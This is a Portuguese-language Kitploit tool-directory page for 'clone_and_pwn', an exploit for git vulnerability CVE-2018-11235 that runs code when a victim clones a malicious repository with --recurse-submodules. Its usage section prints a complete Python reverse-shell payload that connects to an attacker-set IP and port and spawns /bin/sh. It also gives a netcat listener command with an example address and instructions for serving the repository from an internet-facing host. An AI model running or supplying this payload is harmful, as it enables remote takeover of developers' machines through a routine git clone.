Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
clone_and_pwn — Exploits CVE-2018-11235 | Kitploit
Ferramentas/GitHubGitHub/h0k5/clone_and_pwn
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubh0k5/clone_and_pwn

clone_and_pwn

Exploits CVE-2018-11235

Ver Repositório
1há 8 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Cabeçalhos

Título do Exploit: Clone and Pwn
Data: 4 de junho de 2018
Autor do Exploit: Alejandro Caceres
Página do fornecedor: https://git-scm.com/
Link do software: https://git-scm.com/downloads
Versão: código arbitrário é executado nas versões do cliente git anteriores a Git 2.13.7, 2.14.x anteriores a 2.14.4, 2.15.x anteriores a 2.15.2, 2.16.x anteriores a 2.16.4 e 2.17.x anteriores a 2.17.1
Testado em: Linux: Ubuntu, Mint, MacOSX
CVE : CVE-2018-11235

Uso do Exploit para CVE-2018-11235

CVE-2018-11235, apelidado de clone and pwn aqui, cria um repositório git malicioso que explora um bug no git. Quando o repositório é clonado usando a flag --recurse-submodules, código arbitrário é executado nas versões do cliente git anteriores a Git 2.13.7, 2.14.x anteriores a 2.14.4, 2.15.x anteriores a 2.15.2, 2.16.x anteriores a 2.16.4 e 2.17.x anteriores a 2.17.1.

Para usar este módulo, basta colocá-lo em um servidor com acesso direto à internet (ex.: AWS, Digital Ocean) e abrir o evil.sh. Ele se parecerá algo como o seguinte:

root@kitploit:~
#!/usr/bin/python

EXTERN_IP="127.0.0.1"
EXTERN_PORT=8080

#reverse shell to IP EXTERN_IP and port EXTERN_PORT
import socket, subprocess, os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((EXTERN_IP, EXTERN_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Defina EXTERN_IP e EXTERN_PORT para o IP (externo) e a porta onde deseja receber sua reverse shell. Uma reverse shell pode ser recebida com algo como:

nc -l <EXTERN_IP> EXTERN_PORT ex.: nc -l 193.23.23.32 8080

Ou com o módulo de shell genérico do Metasploit. Quando o usuário executar o comando git clone --recurse-submodules git://<seu ip>/repo dest_dir você receberá uma reverse shell.

Se você estiver com problemas ao executar várias vezes (ou após uma tentativa falha), verifique o seguinte:

  • Execute ./clean.sh, note que isso excluirá todos os dados em /tmp
  • verifique os processos com ps aux | grep git para garantir que você não esteja executando gitdaemon. Mate quaisquer processos gitdaemon.

Agradecimentos

Código derivado do git patch de @peff (procure pelo arquivo de teste t/t7415-submodule-names.sh).

Sendo assim, este repositório é publicado sob a GNU General Public License versão 2.

Correção adicional para versões antigas do git cortesia de @atorralba (detalhes neste post).

Este script adaptado de https://github.com/Rogdham/CVE-2018-11235, muito amor e crédito

=======

clone_and_pwn

Explora CVE-2018-11235

Por @_hyp3ri0n e @mehaase

Baixar ferramenta